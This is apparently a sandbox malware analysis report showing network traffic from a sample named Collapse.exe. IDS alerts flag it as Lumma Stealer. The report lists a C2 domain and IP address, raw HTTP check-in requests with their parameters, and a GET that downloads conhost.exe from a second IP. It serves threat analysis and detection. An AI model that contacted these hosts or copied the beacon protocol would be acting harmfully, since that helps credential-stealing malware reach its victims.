                                                                                                      2024-12-24T02:17:26.959139+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749740172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:27.729027+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749740172.67.199.72443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 24, 2024 02:17:05.850352049 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:05.850383043 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:05.850482941 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:05.853123903 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:05.853135109 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.075817108 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.075896025 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.079808950 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.079816103 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.080205917 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.121357918 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.125785112 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.125814915 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.125888109 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.818303108 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.818468094 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.818530083 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.823543072 CET49699443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.823555946 CET44349699172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.842907906 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.842946053 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:07.843017101 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.844068050 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:07.844084978 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.058255911 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.058331966 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.060502052 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.060514927 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.060846090 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.062455893 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.062642097 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.062669992 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.821671963 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.822376966 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.822434902 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.822463036 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.823328972 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.823368073 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.823393106 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.823402882 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.823452950 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.830017090 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.838251114 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.838296890 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.838303089 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.886970997 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.886981010 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.933840036 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.941121101 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:09.980722904 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:09.980741978 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.027621984 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.037928104 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.041798115 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.041848898 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.041856050 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.041898966 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.041948080 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.042046070 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.042056084 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.042066097 CET49700443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.042069912 CET44349700172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.238320112 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.238348007 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:10.238428116 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.238734007 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:10.238749027 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:11.495961905 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:11.496121883 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:11.498552084 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:11.498563051 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:11.498909950 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:11.500360012 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:11.500509024 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:11.500556946 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:12.704988003 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:12.705086946 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:12.705147982 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:12.705333948 CET49701443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:12.705348969 CET44349701172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:12.842178106 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:12.842226028 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:12.842298031 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:12.842628002 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:12.842644930 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.074904919 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.075000048 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.076756954 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.076766014 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.076999903 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.078394890 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.078528881 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.078562975 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.078613043 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.119343042 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.903111935 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.903227091 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:14.903289080 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.903480053 CET49703443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:14.903496981 CET44349703172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:15.146105051 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:15.146152973 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:15.146229982 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:15.146506071 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:15.146533966 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:16.375699043 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:16.375866890 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:16.377037048 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:16.377052069 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:16.377285004 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:16.378542900 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:16.378684998 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:16.378720045 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:16.378783941 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:16.378794909 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:17.319123030 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:17.319283009 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:17.319365978 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:17.319514990 CET49709443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:17.319535971 CET44349709172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:18.548345089 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:18.548388958 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:18.548459053 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:18.548784971 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:18.548805952 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:19.765840054 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:19.765969992 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:19.767384052 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:19.767401934 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:19.767916918 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:19.769227982 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:19.769340992 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:19.769352913 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:20.525319099 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:20.525574923 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:20.525671005 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:20.525970936 CET49715443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:20.526006937 CET44349715172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:21.555505991 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:21.555556059 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:21.555630922 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:21.555999994 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:21.556015015 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.776475906 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.776587009 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.778357983 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.778367996 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.778774023 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.780507088 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.781496048 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.781537056 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.781652927 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.781694889 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.781847954 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.781883001 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.782027006 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.782056093 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.783001900 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.783032894 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.783227921 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.783258915 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.783283949 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.783471107 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.783502102 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.827343941 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.827625036 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.827671051 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.827682972 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.871332884 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.871515036 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.871567965 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.871593952 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.919336081 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:22.919426918 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:22.963360071 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:23.142807007 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:25.611607075 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:25.611875057 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:25.613419056 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:25.613521099 CET49726443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:25.613535881 CET44349726172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:25.741550922 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:25.741563082 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:25.741683960 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:25.742041111 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:25.742067099 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:26.959064960 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:26.959139109 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:26.961189032 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:26.961206913 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:26.961543083 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:26.981883049 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:26.981919050 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:26.981992006 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:27.729018927 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:27.729159117 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:27.729286909 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:27.729393959 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:27.729444027 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:27.729474068 CET49740443192.168.2.7172.67.199.72
                                                                                                      Dec 24, 2024 02:17:27.729490042 CET44349740172.67.199.72192.168.2.7
                                                                                                      Dec 24, 2024 02:17:27.732490063 CET4974280192.168.2.7147.45.47.81
                                                                                                      Dec 24, 2024 02:17:27.851955891 CET8049742147.45.47.81192.168.2.7
                                                                                                      Dec 24, 2024 02:17:27.855142117 CET4974280192.168.2.7147.45.47.81
                                                                                                      Dec 24, 2024 02:17:27.855328083 CET4974280192.168.2.7147.45.47.81
                                                                                                      Dec 24, 2024 02:17:27.974816084 CET8049742147.45.47.81192.168.2.7
                                                                                                      Dec 24, 2024 02:17:49.743653059 CET8049742147.45.47.81192.168.2.7
                                                                                                      Dec 24, 2024 02:17:49.743782997 CET4974280192.168.2.7147.45.47.81
                                                                                                      Dec 24, 2024 02:17:49.743855953 CET4974280192.168.2.7147.45.47.81
                                                                                                      Dec 24, 2024 02:17:49.864228010 CET8049742147.45.47.81192.168.2.7
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 24, 2024 02:17:05.539305925 CET6187453192.168.2.71.1.1.1
                                                                                                      Dec 24, 2024 02:17:05.845431089 CET53618741.1.1.1192.168.2.7
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 24, 2024 02:17:05.539305925 CET192.168.2.71.1.1.10x6bd6Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 24, 2024 02:17:05.845431089 CET1.1.1.1192.168.2.70x6bd6No error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                      Dec 24, 2024 02:17:05.845431089 CET1.1.1.1192.168.2.70x6bd6No error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                      • observerfry.lat
                                                                                                      • 147.45.47.81
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749742147.45.47.81805924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 24, 2024 02:17:27.855328083 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Host: 147.45.47.81


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749699172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:07 UTC262OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2024-12-24 01:17:07 UTC1125INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:07 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=anfmq1hb7v2rsfs40dhen883c8; expires=Fri, 18 Apr 2025 19:03:46 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=taNgCfGBPnRFjYhpRkTQU9n31yE5ixZStY3uH%2BBM%2FOQOba3faBS5hbNj7LqaFa86ksUzBPgODBzqDFcpyVmALpZMmDorVLBKgieCiRaiNyQQavgdlH9FbGm2zotjN%2FRL%2F9M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cbff8e9278cb4-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1802&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1574123&cwnd=189&unsent_bytes=0&cid=ec9a4055e48e076d&ts=760&x=0"
                                                                                                      2024-12-24 01:17:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2024-12-24 01:17:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749700172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:09 UTC263OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 49
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:09 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 26 6a 3d
                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@distez&j=
                                                                                                      2024-12-24 01:17:09 UTC1129INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:09 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=h07v7kt9r5dij9ht8pm3qm9mv3; expires=Fri, 18 Apr 2025 19:03:48 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OHbI5N%2BqkSx8ayU3kji9REcJsT%2BncNpmkLyjai9fXZ6q9u9QDAqR7MiRaU0xiWxWWXl6ycIwXE5%2BVFqn4frQTI3Ce2qzVq%2FAWpf27e%2FIx%2FjxwUFyhHjTQKplAwGLkHqZtF4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc0055fca437e-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2539&min_rtt=2511&rtt_var=962&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=948&delivery_rate=1162883&cwnd=236&unsent_bytes=0&cid=8de8c54e4fa153b7&ts=770&x=0"
                                                                                                      2024-12-24 01:17:09 UTC240INData Raw: 34 36 39 0d 0a 36 32 34 43 2b 65 37 55 77 50 66 33 78 30 50 65 34 63 52 4f 74 71 30 74 2f 42 48 4b 63 4c 37 48 56 36 39 49 64 52 44 66 50 64 4b 51 54 48 54 62 31 4f 44 73 31 59 53 69 59 65 53 56 74 6a 76 54 67 51 2b 64 64 65 68 4b 32 4b 59 37 33 43 31 5a 4d 71 6c 51 38 4e 45 49 59 35 57 64 73 65 7a 56 6b 72 39 68 35 4c 71 2f 62 4e 50 44 44 38 59 7a 72 78 72 63 70 6a 76 4e 4b 52 35 2f 72 31 47 78 67 77 4a 6c 6b 59 75 33 70 4a 61 62 71 69 61 37 68 4b 55 6b 32 4d 52 41 6c 48 7a 6f 58 4a 79 69 4c 59 31 79 56 31 32 36 53 62 4f 6d 44 33 47 53 7a 4b 6e 73 6a 4e 57 69 4c 66 7a 62 35 69 2f 54 7a 30 47 61 64 61 45 59 31 71 38 7a 7a 43 77 66 59 4c 5a 62 75 6f 4d 4d 5a 70 43 42 76 72 43 62 6b 61 30 74 76 59 36 6c 62 4a 71
                                                                                                      Data Ascii: 469624C+e7UwPf3x0Pe4cROtq0t/BHKcL7HV69IdRDfPdKQTHTb1ODs1YSiYeSVtjvTgQ+ddehK2KY73C1ZMqlQ8NEIY5WdsezVkr9h5Lq/bNPDD8YzrxrcpjvNKR5/r1GxgwJlkYu3pJabqia7hKUk2MRAlHzoXJyiLY1yV126SbOmD3GSzKnsjNWiLfzb5i/Tz0GadaEY1q8zzCwfYLZbuoMMZpCBvrCbka0tvY6lbJq
